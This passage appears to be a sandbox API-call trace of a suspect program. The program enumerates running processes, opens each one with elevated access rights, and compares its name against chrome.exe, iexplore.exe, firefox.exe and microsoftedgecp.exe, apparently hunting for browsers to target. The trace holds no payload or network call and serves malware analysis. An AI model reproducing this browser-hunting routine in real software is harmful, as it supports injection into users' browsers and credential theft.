	[0212.341] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3d28
	[0212.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.342] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.342] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.343] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.343] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0212.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3d2c
	[0212.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.344] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0212.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.344] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.345] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0212.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.345] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.345] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3d30
	[0212.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.346] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.346] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.347] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.347] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.347] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0212.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3d34
	[0212.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.348] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3d38
	[0212.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3d3c
	[0212.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0212.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3d40
	[0212.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0212.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0212.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0212.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3d44
	[0212.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.357] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0212.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.357] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0212.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0212.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3d48
	[0212.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.359] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.359] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.359] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.360] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.360] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0212.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3d4c
	[0212.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.361] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0212.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.361] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.361] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0212.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.362] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0212.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0212.363] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0212.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3d50
	[0212.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0212.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.365] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0212.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.366] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0212.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3d54
	[0212.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.367] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0212.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.367] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.367] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0212.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.368] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.368] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0212.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3d58
	[0212.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.369] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0212.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.369] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0212.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.370] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0212.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3d5c
	[0212.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.371] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0212.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.371] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0212.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.372] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0212.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3d60
	[0212.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.373] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0212.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.374] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.374] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0212.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.375] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.375] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0212.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3d64
	[0212.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.376] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0212.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.376] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.377] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0212.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.377] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.377] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0212.378] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3d68
	[0212.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.378] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0212.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.378] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.379] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0212.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.380] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.380] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0212.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3d6c
	[0212.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.381] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0212.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.381] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.382] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0212.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.382] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.383] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0212.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3d70
	[0212.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.383] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0212.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.384] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.384] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0212.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.384] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.384] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0212.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3d74
	[0212.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.385] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0212.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.385] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.386] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0212.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.386] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.386] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0212.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3d78
	[0212.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.387] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0212.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.388] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.388] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0212.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.388] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.389] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0212.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3d7c
	[0212.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.390] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0212.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.390] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.391] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0212.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.391] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.392] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0212.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3d80
	[0212.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.393] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0212.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.393] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.394] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0212.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.394] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.395] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0212.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3d84
	[0212.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.396] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0212.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.397] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.397] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0212.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.398] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.399] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
